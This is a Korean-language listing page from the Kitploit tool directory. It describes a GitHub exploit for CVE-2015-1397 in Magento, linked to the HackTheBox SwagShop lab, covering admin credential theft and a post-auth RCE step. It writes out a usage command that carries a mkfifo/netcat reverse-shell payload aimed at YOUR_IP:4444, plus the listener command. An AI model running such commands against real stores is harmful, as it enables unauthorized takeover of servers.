Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2015-1397-Magento-Shoplift — Magento CMS의 CVE-2015-1397용 익스플로잇 스크립트로, 관리자 자격 증명을 얻기 위한 사전 인증 익스플로잇과 역방향 셸 실행을 위한 사후 인증 RCE 모듈을 포함합니다. | Kitploit
도구/GitHubGitHub/wytchwulf/cve-2015-1397-magento-shoplift
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration Testing
GitHubwytchwulf/cve-2015-1397-magento-shoplift

CVE-2015-1397-Magento-Shoplift

Magento CMS의 CVE-2015-1397용 익스플로잇 스크립트로, 관리자 자격 증명을 얻기 위한 사전 인증 익스플로잇과 역방향 셸 실행을 위한 사후 인증 RCE 모듈을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
22년 전아직 검토되지 않음

CVE-2015-1397-Magento-Shoplift

취약점 세부 정보

HackTheBox - SwagShop에서 확인된 취약점

1단계 = exploit.py

Magento CMS 대시보드에 대한 관리자 자격 증명 획득

2단계 = post_auth.py

exploit.py에서 획득한 자격 증명을 post_auth.py에 추가한 후 실행:

root@kitploit:~
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"

리스너:

root@kitploit:~
nc -lvnp 4444
도구 다운로드